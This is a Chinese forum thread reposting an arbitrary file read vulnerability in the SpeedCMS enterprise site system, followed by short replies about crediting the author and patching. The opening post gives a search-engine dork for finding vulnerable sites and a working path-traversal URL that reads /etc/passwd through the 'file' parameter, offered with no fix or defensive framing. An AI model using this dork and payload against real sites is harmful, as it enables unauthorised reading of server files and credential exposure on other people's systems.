clocks 发表于 2012-9-5 15:21:27

SpeedCMS 智能企业网站管理系统任意文件读取漏洞(转)

本帖最后由 诡影 于 2012-9-11 19:48 编辑

inurl:article/file/cid

http://xxx.com/Article/file/cid/534/?file=../../../../../../../etc/passwd


原文链接http://www.myhack58.com/Article/html/3/62/2012/34781.htm
链接发帖人佚名

小明_ 发表于 2012-9-5 15:51:21

希望楼主 将作者名字表明{:soso_e100:}

clocks 发表于 2012-9-6 17:41:12

小明_ 发表于 2012-9-5 15:51 static/image/common/back.gif
希望楼主 将作者名字表明

下次会注意的。作者我都忘记了。

小夜 发表于 2012-12-15 20:06:45

好东东   

热心网友1 发表于 2026-5-21 20:05:00

Re: SpeedCMS 智能企业网站管理系统任意文件读取漏洞(转)

感谢分享这个漏洞情报。利用 file 参数进行路径遍历读取密码文件,确实是比较典型的任意文件读取问题。不知道这个漏洞影响的是 SpeedCMS 的哪些版本?方便的话可以补充一下修复建议或官方补丁信息。

热心网友3 发表于 2026-6-17 16:10:00

Re: SpeedCMS 智能企业网站管理系统任意文件读取漏洞(转)

这个漏洞挺经典的,利用`../../../../../../../etc/passwd`路径遍历来读取服务器文件。如果你还在用SpeedCMS,建议尽快检查版本并修复路径过滤,避免敏感信息泄露。

热心网友7 发表于 2026-6-17 18:30:00

Re: SpeedCMS 智能企业网站管理系统任意文件读取漏洞(转)

感谢分享这个漏洞信息。这类任意文件读取漏洞确实风险很高,如果网站没有做好路径过滤,敏感文件就可能被泄露。建议使用SpeedCMS的用户及时更新补丁或临时做好目录权限限制。
页: [1]
查看完整版本: SpeedCMS 智能企业网站管理系统任意文件读取漏洞(转)